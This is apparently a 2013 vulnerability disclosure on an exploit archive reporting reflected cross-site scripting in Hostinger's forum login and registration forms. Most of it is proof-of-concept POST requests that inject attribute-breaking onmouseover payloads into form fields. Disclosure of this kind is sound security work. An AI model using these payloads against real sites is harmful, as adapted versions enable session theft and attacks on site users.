Hostinger Web Hosting Cross Site Scripting

Hostinger Web Hosting Cross Site Scripting: Posted Jun 17, 2013; Authored by Juan Carlos Garcia; Hostinger Web Hosting suffers from multiple cross site scripting vulnerabilities.; tags | exploit, web, vulnerability, xss; SHA-256 | d4df1d9a2179f68c53b64dfbdf8a2a1dd84c602165ca1cac6074386192683ec9; Download | Favorite | View

Hostinger Web Hosting Cross Site Scripting

Hostinger Web Hosting Multiple Cross Site Scripting


Report-Timeline:
================
2013-06-01:     Researcher Notification 
2013-06-03:     RESPONSE
2013-06-07:     Ask About the issues
2013-06-10:     Vendor Feedback
2013-06-13:     Not Fixed
2013-06-16:     Full Disclosure


I-VULNERABILITY
-------------------------
#Title: Hostinger Web Hosting Multiple Cross Site Scripting

#Vendor:http://www.hostinger.es

#Author:Juan Carlos García (@secnight)

#Follow me 
 http://www.highsec.es
 HTTP://WWW.radio3w.com
 http://hackingmadrid.blogspot.com
 http://blogs.0verl0ad.com
Twitter:@secnight
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn


II-Introduction:
=============
Hostinger® is a free and affordable premium web hosting services provider and domain registrar.

Hostinger has grown from a small web hosting provider into a world leading and industry recognized 

web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community.

Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil,

Argentina, Mexico, Columbia, Russia, Ukraine, and many more countries on their way!
-------------------------

III-PROOF OF CONCEPT
=============

Affected items

/forum/login (5)
/forum/register (8)

Attack details

/forum/login 
=============

URL encoded POST input email was set to " onmouseover=prompt(952323) bad="
The input is reflected inside a tag element between double quotes.

POST /forum/login HTTP/1.1

email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1

VARIANTS

email 2
-------

email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1

email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight


pass 3
-------

email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1

email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22

email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1


/forum/register. 
=============

URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad="

The input is reflected inside a tag element between double quotes.

POST /forum/register HTTP/1.1

confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal


VARIANTS
----------
----------

confirmPass 2
-------------

confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge


email 2
--------

confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

Name 2
-------
confirmPass=secnight&email=secnight@email.tst&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge


pass 2
-------

confirmPass=secnight&email=secnight@email.tst&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge

confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

Top Authors In Last 30 Days

Red Hat 277 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 66 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Debian 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,107)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,764)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,813)
UNIX (9,453)
UnixWare (188)
Windows (6,765)
Other

Hostinger Web Hosting Cross Site Scripting

Hostinger Web Hosting Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Hostinger Web Hosting Cross Site Scripting

Share This

Hostinger Web Hosting Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems